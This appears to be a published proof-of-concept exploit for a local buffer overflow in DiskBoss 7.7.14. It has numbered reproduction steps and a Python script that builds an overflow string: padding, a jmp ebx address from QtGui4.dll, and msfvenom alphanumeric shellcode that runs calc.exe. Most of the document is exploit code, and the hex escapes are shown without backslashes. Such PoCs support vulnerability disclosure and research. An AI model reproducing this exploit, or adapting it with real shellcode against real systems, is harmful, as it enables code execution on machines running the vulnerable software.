# Exploit Title: DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)
# Vendor Homepage: https://www.diskboss.com/
# Software Link Download: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-04-01
# Vulnerable Software: DiskBoss
# Version: 7.7.14
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)

# Steps to Reproduce the Crash:

# 1.- Run python code: DiskbossLCE.py
# 2.- Copy content to clipboard
# 3.- Turn off DEP for diskbsg.exe
# 4.- Open "diskboss.exe" (diskbsg.exe)
# 5.- Go to "Command" > Search Files
# 6.- Click on second + icon (located at right side of "Search Disks, Directories and Network Shares")
# 7.- Click on " Add Input Directory"
# 8.- Paste ClipBoard into the "Directory" field
# 9.- Click on OK
# 10.- Calc.exe runs

#################################################################################################################################################

# Python "DiskbossLCE.py" Code:

f = open("DiskbossLCE.txt", "w")

# Message= 0x650EA4CA : jmp ebx | [QtGui4.dll] (C:Program FilesDiskBossinQtGui4.dll)

jmpebx = "xCAxA4x0Ex65"

# msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed BufferRegister=EBX -f python -b "x0ax0dx2fx5cx00"

buf = ""
buf += "x53x59x49x49x49x49x49x49x49x49x49x49x49"
buf += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30"
buf += "x41x30x41x6bx41x41x51x32x41x42x32x42x42"
buf += "x30x42x42x41x42x58x50x38x41x42x75x4ax49"
buf += "x79x6cx79x78x4ex62x73x30x63x30x67x70x73"
buf += "x50x4fx79x48x65x56x51x59x50x31x74x6cx4b"
buf += "x30x50x50x30x4cx4bx51x42x74x4cx6ex6bx51"
buf += "x42x74x54x4cx4bx44x32x77x58x44x4fx4cx77"
buf += "x70x4ax55x76x44x71x69x6fx4cx6cx45x6cx53"
buf += "x51x73x4cx55x52x74x6cx31x30x49x51x4ax6f"
buf += "x34x4dx43x31x7ax67x69x72x6cx32x72x72x71"
buf += "x47x6cx4bx42x72x54x50x6cx4bx70x4ax65x6c"
buf += "x4cx4bx70x4cx64x51x62x58x39x73x51x58x67"
buf += "x71x38x51x66x31x4cx4bx31x49x31x30x33x31"
buf += "x78x53x4cx4bx31x59x44x58x49x73x65x6ax51"
buf += "x59x6ex6bx30x34x4ex6bx73x31x58x56x56x51"
buf += "x4bx4fx6cx6cx5ax61x5ax6fx34x4dx65x51x58"
buf += "x47x35x68x4dx30x30x75x58x76x55x53x31x6d"
buf += "x49x68x45x6bx43x4dx74x64x32x55x4bx54x42"
buf += "x78x6cx4bx51x48x46x44x57x71x48x53x62x46"
buf += "x4ex6bx46x6cx50x4bx4cx4bx73x68x75x4cx43"
buf += "x31x79x43x4ex6bx36x64x6cx4bx45x51x6ex30"
buf += "x4ex69x30x44x56x44x57x54x51x4bx61x4bx73"
buf += "x51x51x49x50x5ax50x51x4bx4fx6bx50x33x6f"
buf += "x33x6fx72x7ax6cx4bx42x32x78x6bx4ex6dx31"
buf += "x4dx50x6ax56x61x6ex6dx4bx35x38x32x43x30"
buf += "x47x70x35x50x42x70x62x48x36x51x4ex6bx32"
buf += "x4fx6dx57x49x6fx4ex35x6fx4bx7ax50x4dx65"
buf += "x6cx62x32x76x71x78x6cx66x6ex75x4fx4dx6f"
buf += "x6dx4bx4fx5ax75x65x6cx46x66x33x4cx66x6a"
buf += "x6bx30x4bx4bx4dx30x53x45x34x45x4fx4bx53"
buf += "x77x64x53x64x32x30x6fx42x4ax43x30x50x53"
buf += "x59x6fx78x55x75x33x51x71x72x4cx73x53x36"
buf += "x4ex55x35x74x38x71x75x47x70x41x41"

junk1 = "A" * 4096
junk2 = "C" * 1196


payload= junk1 + jmpebx + junk2 + buf


f.write(payload)
f.close()